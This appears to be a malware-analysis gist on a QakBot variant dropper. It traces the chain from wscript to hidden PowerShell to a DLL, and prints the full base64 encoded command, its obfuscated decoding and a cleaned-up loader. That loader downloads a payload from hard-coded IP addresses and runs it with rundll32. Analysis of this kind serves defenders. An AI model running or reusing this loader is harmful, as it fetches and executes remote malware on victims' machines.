Skip to content

Instantly share code, notes, and snippets.

@petergs

petergs/qbot.md

Last active January 4, 2024 06:03
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save petergs/32e0d05305726782e8bcfc6c0c560913 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save petergs/32e0d05305726782e8bcfc6c0c560913 to your computer and use it in GitHub Desktop.
Download ZIP
qakbot-variant-dropper
Raw
qbot.md

Execution

wscript -> powershell -> .dll
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" 
"C:\Windows\System32\wscript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" seroplasticGodchild bankweedPolycratic unmiserly becassockedUndividedness 
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABjAGEAbAB1AG0AbgBpAGEAdABlAGQARgBvAG8AbABoAGEAcgBkAGkAZQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBkAEEAQgBvAEEARwA4AEEAYwBnAEIAdQBBAEMANABBAGIAZwBCAGgAQQBHAGMAQQBiAHcAQgA1AEEARwBFAEEAegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBQAEEASABVAEEAZABBAEIAbQBBAEcAawBBAFoAUQBCAHMAQQBHAFEAQQBaAFEAQgB5AEEASABNAEEATABnAEIAeQBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQQA9AD0AegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYgBBAEIANQBBAEcATQBBAGEAQQBCAGgAQQBHAFUAQQBkAEEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEgAYwBBAGIAdwBCAHkAQQBHAHcAQQBaAEEAQQA9ACIAOwAkAGgAZQBtAGEAZgBpAGIAcgBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEgASQBBAGIAdwBCADEAQQBHADQAQQBaAEEAQgByAEEARwBVAEEAWgBRAEIAdwBBAEcAVQBBAGMAZwBCAFUAQQBHAGsAQQBaAFEAQgAyAEEARwBrAEEAYgBnAEIAbABBAEMANABBAGQAZwBCAHAAQQBHAHcAQQBiAEEAQgBoAEEASABNAEEAUABNAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBBAEIAdABBAEcAOABBAGIAZwBCAHAAQQBHADQAQQBaAHcAQQB1AEEASABNAEEAWQB3AEIAbwBBAEcAOABBAGIAdwBCAHMAQQBBAD0APQBQAE0AVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgBqAEEASABJAEEAYgB3AEIAegBBAEgAQQBBAGEAQQBCAGwAQQBIAEkAQQBhAFEAQgBqAEEARwBFAEEAYgBBAEIAVQBBAEcAZwBBAFoAUQBCAHYAQQBHAHcAQQBiAHcAQgBuAEEARwBVAEEAYwBnAEEAdQBBAEgATQBBAGIAdwBCAGoAQQBHAGsAQQBZAFEAQgBzAEEAQQA9AD0AUABNAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYgBBAEIAbABBAEcAOABBAGMAdwBCAHcAQQBHADgAQQBjAGcAQgBoAEEARgBVAEEAYgBnAEIAMABBAEgASQBBAGEAUQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAWgBnAEIAdgBBAEEAPQA9ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAkAEkAcwBvAGMAZQBwAGgAYQBsAGkAcwBtACAAPQAgACIAUwBhAHkAeQBpAGQAcwBVAG4AYgBsAGEAcwBwAGgAZQBtAGUAZAAiADsAJABzAHAAZQBsAGwAZQBkACAAPQAgADIAMAA1ADsAJABwAGgAeQB0AGkAdgBvAHIAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBOAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQARQBBAEwAZwBBADUAQQBEAFkAQQBMAGcAQQAyAEEARABBAEEASABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEIAcABBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBhAFEAQgB1AEEARwBjAEEATABnAEIAbQBBAEcAOABBAGIAdwBCADAAQQBHAEkAQQBZAFEAQgBzAEEARwB3AEEASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGsAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADQAQQBDADQAQQBNAFEAQQB4AEEARABrAEEASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBHAEUAQQBjAEEAQgB2AEEASABJAEEAWQBRAEIAcwBBAEgATQBBAEwAZwBCAG4AQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYwB3AEEAPQAiADsAJABBAG4AdABpAGMAbAB5AEQAZQBwAHIAZQBzAHMAYQBuAHQAaAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE0AUQBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAHcAQgByAEEASABJAEEAZABRAEIAMQBBAEYAVQBBAFMAUQBBAHYAQQBIAFUAQQBhAFEAQgB1AEEARgBVAEEAZABBAEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEUAQQBNAEEAQQB2AEEASABJAEEAVQBRAEEANABBAEgAYwBBAFIAUQBCAEIAQQBGAEEAQQBMAHcAQQA1AEEARgBZAEEAVABBAEIARABBAEUATQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADEAQQBDADQAQQBNAGcAQQB4AEEARABNAEEATABnAEEAeQBBAEQAUQBBAE4AdwBBAHYAQQBHAGMAQQBXAGcAQgBZAEEARwAwAEEAYQBRAEIAcQBBAEMAOABBAE0AQQBCAHEAQQBGAFEAQQBVAEEAQQAyAEEARABrAEEAVwBRAEIAQwBBAEEAPQA9AFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATQBnAEEAdQBBAEQASQBBAE4AUQBBAHkAQQBDADQAQQBNAFEAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AQQBBAHYAQQBEAEUAQQBUAGcAQgB2AEEARQBRAEEAVwBBAEEAdgBBAEgARQBBAGEAZwBCAFYAQQBIAEUAQQBOAGcAQgBOAEEARABjAEEATwBRAEIAWgBBAEcAawBBAFQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATQBpAHMAZABpAHMAcABvAHMAZQBSAGUAYQBzAHMAZQByAHQAaQBvAG4AIABpAG4AIAAkAEEAbgB0AGkAYwBsAHkARABlAHAAcgBlAHMAcwBhAG4AdABoACAALQBzAHAAbABpAHQAIAAiAFoAIgApACAAewAkAGwAYQBtAGUAbgB0AGEAdABpAG8AbgBzAFAAYQByAGEAbgBlAHQAZQAgAD0AIAAiAG0AdQB0AHQAbwBuAGgAZQBhAGQAZQBkAG4AZQBzAHMATQBpAGMAcgBhAG4AdABoAHIAbwBwAG8AcwAiADsAdAByAHkAIAB7ACQAcABpAGUAcgBjAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAYQBRAEIAdABBAEcANABBAFoAUQBCAHoAQQBIAE0AQQBWAFEAQgB1AEEARwA4AEEAYwBnAEIAdQBBAEcARQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBoAEEARwB3AEEATABnAEIAagBBAEcARQBBAGMAdwBCAGgAQQBBAD0APQBVAFgAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQARQBBAEwAZwBBADMAQQBEAE0AQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABIAGUAbQBpAGEAbgBvAHAAaQBhACAAPQAgACIAbABpAGIAaQBkAGkAbgBpAHMAdAAiADsAJABmAGkAbgBlAHMAdAByAGEASQBtAHAAcgBvAHYAaQBzAG8AcgBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAE0AaQBzAGQAaQBzAHAAbwBzAGUAUgBlAGEAcwBzAGUAcgB0AGkAbwBuACkAKQA7AHcAZwBlAHQAIAAkAGYAaQBuAGUAcwB0AHIAYQBJAG0AcAByAG8AdgBpAHMAbwByAHMAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABXAGkAdABoAGUAcgBlAHIATwB1AHQAcgBhAG4AawBlAGQALgBwAGgAbwB0AG8AdABlAGwAZQBwAGgAbwBuAGUARgBlAG0AcAB0AHkAOwAkAFUAbgBkAGUAcgB0AGgAaQBlAGYAIAA9ACAAIgBQAHIAbwBvAGYAcgBvAG8AbQBVAG4AcABhAHQAcgBpAHMAdABpAGMAYQBsAGwAeQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFcAaQB0AGgAZQByAGUAcgBPAHUAdAByAGEAbgBrAGUAZAAuAHAAaABvAHQAbwB0AGUAbABlAHAAaABvAG4AZQBGAGUAbQBwAHQAeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANgA5ADEANQA0ACkAewAkAEIAYQBsAGwAYQBkAGUAcwAgAD0AIAAxADkAMAA7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFYAdwBCAHAAQQBIAFEAQQBhAEEAQgBsAEEASABJAEEAWgBRAEIAeQBBAEUAOABBAGQAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEARwBzAEEAWgBRAEIAawBBAEMANABBAGMAQQBCAG8AQQBHADgAQQBkAEEAQgB2AEEASABRAEEAWgBRAEIAcwBBAEcAVQBBAGMAQQBCAG8AQQBHADgAQQBiAGcAQgBsAEEARQBZAEEAWgBRAEIAdABBAEgAQQBBAGQAQQBCADUAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAG8AYgBzAHQAZQB0AHIAaQBjAGEAdABpAG8AbgBUAHIAbwBnAG8AbgBzACAAPQAgACIAUwBjAGgAbwBvAGwAYgBvAHkAaQBzAG0AIgA7ACQAUgBlAGMAaABhAG8AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGEAQQBCAHkAQQBHADgAQQBZAFEAQgAwAEEARwBrAEEAYgBnAEIAbgBBAEUAUQBBAFoAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBhAFEAQgAwAEEAQQA9AD0AZwB5AE0AQwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADAAQQBEAGcAQQBMAGcAQQAwAEEARABJAEEAZwB5AE0AQwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABNAEEATQBnAEEAPQAiADsAfQB9ACQAYgBhAHIAYgBpAHQAYQBsAHMAUgBhAGQAaQBvAHAAYQBjAGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBBAEEAdQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQAVQBBAFoAeQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAZwBCAGsAQQBIAFUAQQBiAHcAQgAxAEEASABNAEEAYgBBAEIANQBBAEUAZwBBAFoAUQBCAHQAQQBHAGsAQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIAaABBAEcAdwBBAEwAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEAQQA9AD0AIgA7ACQAcABuAGUAbwBtAGEAbgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA0AEEATgBnAEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGMAQQBOAEIAegBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAOABBAFkAdwBCAHIAQQBHADQAQQBaAFEAQgA1AEEARwBZAEEAZQBRAEIAcABBAEcANABBAFoAdwBCAEoAQQBHADAAQQBjAEEAQgBoAEEASABJAEEAZABBAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHAEUAQQBkAEEAQgBsAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAE4AQgB6AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEcAawBBAFkAZwBCAHkAQQBHADgAQQBiAGcAQgBqAEEARwBnAEEAYQBRAEIAaABBAEcAdwBBAEwAZwBCAG4AQQBIAFUAQQBhAFEAQgBrAEEARwBVAEEATgBCAHoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEEAQQBiAEEAQgBsAEEARwA4AEEAYgBRAEIAdgBBAEgASQBBAGMAQQBCAG8AQQBHADgAQQBkAFEAQgB6AEEARgBRAEEAYgB3AEIAdABBAEcASQBBAGIAdwBCADUAQQBHAFkAQQBkAFEAQgBzAEEAQwA0AEEAYwBBAEIAcwBBAEEAPQA9ACIAOwA="

Obfuscated Powershell

Base64 decoded with some formatting - Cyberchef

$calumniatedFoolhardiest = "aAB0AHQAcAA6AC8ALwB1AG4AdABoAG8AcgBuAC4AbgBhAGcAbwB5AGEAzTPaAB0AHQAcAA6AC8ALwBPAHUAdABmAGkAZQBsAGQAZQByAHMALgByAGUAbgB0AGEAbABzAA==zTPaAB0AHQAcAA6AC8ALwBwAG8AbAB5AGMAaABhAGUAdABvAHUAcwAuAHcAbwByAGwAZAA=";
$hemafibrite = "aAB0AHQAcAA6AC8ALwBHAHIAbwB1AG4AZABrAGUAZQBwAGUAcgBUAGkAZQB2AGkAbgBlAC4AdgBpAGwAbABhAHMAPMVaAB0AHQAcABzADoALwAvAGEAbABtAG8AbgBpAG4AZwAuAHMAYwBoAG8AbwBsAA==PMVaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAHAAaABlAHIAaQBjAGEAbABUAGgAZQBvAGwAbwBnAGUAcgAuAHMAbwBjAGkAYQBsAA==PMVaAB0AHQAcABzADoALwAvAFAAbABlAG8AcwBwAG8AcgBhAFUAbgB0AHIAaQBlAGQALgBpAG4AZgBvAA==";
Start-Sleep -Seconds 15;
$Isocephalism = "SayyidsUnblasphemed";
$spelled = 205;
$phytivorous = "aAB0AHQAcABzADoALwAvADIANQAzAC4AMgAxADEALgA5ADYALgA2ADAAHaAB0AHQAcABzADoALwAvAE0AYQB0AGUAcgBpAGEAbABpAHoAaQBuAGcALgBmAG8AbwB0AGIAYQBsAGwAHaAB0AHQAcAA6AC8ALwA1ADkALgAxADQANgAuADEAMgA4AC4AMQAxADkAHaAB0AHQAcAA6AC8ALwBjAGEAcABvAHIAYQBsAHMALgBnAHIAYQB0AGkAcwA=";
$AnticlyDepressanth = "aAB0AHQAcAA6AC8ALwAxADUAMQAuADIAMwA2AC4AMgAyAC4AMQA1ADgALwBrAHIAdQB1AFUASQAvAHUAaQBuAFUAdAA=ZaAB0AHQAcAA6AC8ALwAxADUAOAAuADIANQA1AC4AMgAxADMALgAxADEAMAAvAHIAUQA4AHcARQBBAFAALwA5AFYATABDAEMAZaAB0AHQAcAA6AC8ALwAxADUAOAAuADIANQA1AC4AMgAxADMALgAyADQANwAvAGcAWgBYAG0AaQBqAC8AMABqAFQAUAA2ADkAWQBCAA==ZaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADUALgAyADIANAAvADEATgBvAEQAWAAvAHEAagBVAHEANgBNADcAOQBZAGkATQA=";
foreach ($MisdisposeReassertion in $AnticlyDepressanth -split "Z") {
    $lamentationsParanete = "muttonheadednessMicranthropos";
    try {
        $piercent = "aAB0AHQAcAA6AC8ALwBQAHIAaQBtAG4AZQBzAHMAVQBuAG8AcgBuAGEAbQBlAG4AdABhAGwALgBjAGEAcwBhAA==UXRaAB0AHQAcABzADoALwAvADIAMQAxAC4AMQA0ADEALgA3ADMALgAyADAAMgA=";
        $Hemianopia = "libidinist";
        $finestraImprovisors = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($MisdisposeReassertion));
        wget $finestraImprovisors -O C:\ProgramData\WithererOutranked.phototelephoneFempty;
        $Underthief = "ProofroomUnpatristically";
        if ((Get-Item -Path C:\ProgramData\WithererOutranked.phototelephoneFempty).Length -ge 169154){
            $Ballades = 190;
            powershell -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVwBpAHQAaABlAHIAZQByAE8AdQB0AHIAYQBuAGsAZQBkAC4AcABoAG8AdABvAHQAZQBsAGUAcABoAG8AbgBlAEYAZQBtAHAAdAB5ACwAcAByAGkAbgB0ADsA";
            break;
        }
        ReactJS;
    } 
    catch {
        $obstetricationTrogons = "Schoolboyism";
        $Rechaos = "aAB0AHQAcABzADoALwAvAHQAaAByAG8AYQB0AGkAbgBnAEQAZQBwAG8AcgB0AGEAdABpAG8AbgBzAC4AaQB0AA==gyMCaAB0AHQAcAA6AC8ALwAxADMANgAuADIAMAA3AC4AMQA0ADgALgA0ADIAgyMCaAB0AHQAcABzADoALwAvADEAMAA2AC4ANwA1AC4AMQA3ADEALgAxADMAMgA=";
    }
}
$barbitalsRadiopacity = "aAB0AHQAcAA6AC8ALwAxADAANAAuADUAMgAuADIAMAAzAC4AMgA1ADUAZyQaAB0AHQAcABzADoALwAvAGEAcgBkAHUAbwB1AHMAbAB5AEgAZQBtAGkAdAByAG8AcABhAGwALgBmAGkAcwBoAA==";
$pneomanometer = "aAB0AHQAcAA6AC8ALwAyADUAMgAuADIANAAzAC4ANgAyAC4AMQA1ADcANBzgaAB0AHQAcAA6AC8ALwBDAG8AYwBrAG4AZQB5AGYAeQBpAG4AZwBJAG0AcABhAHIAdABlAGQALgBjAGEAdABlAHIAaQBuAGcANBzgaAB0AHQAcABzADoALwAvAFAAZQByAGkAYgByAG8AbgBjAGgAaQBhAGwALgBnAHUAaQBkAGUANBzgaAB0AHQAcABzADoALwAvAHAAbABlAG8AbQBvAHIAcABoAG8AdQBzAFQAbwBtAGIAbwB5AGYAdQBsAC4AcABsAA==";

Removing the cruft

Start-Sleep -Seconds 15;
$urls = ["http://151.236.22.158/kruuUI/uinUt", "http://158.255.213.110/rQ8wEAP/9VLCC", "http://158.255.213.247/gZXmij/0jTP69YB", "http://162.252.175.224/1NoDX/qjUq6M79"]
foreach ($url in $urls) {
    try {
        wget $url -O C:\ProgramData\WithererOutranked.phototelephoneFempty;
        if ((Get-Item -Path C:\ProgramData\WithererOutranked.phototelephoneFempty).Length -ge 169154){
            Start-Process rundll32 C:\ProgramData\WithererOutranked.phototelephoneFempty,print;
            break;
        }
    } 
    catch{}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment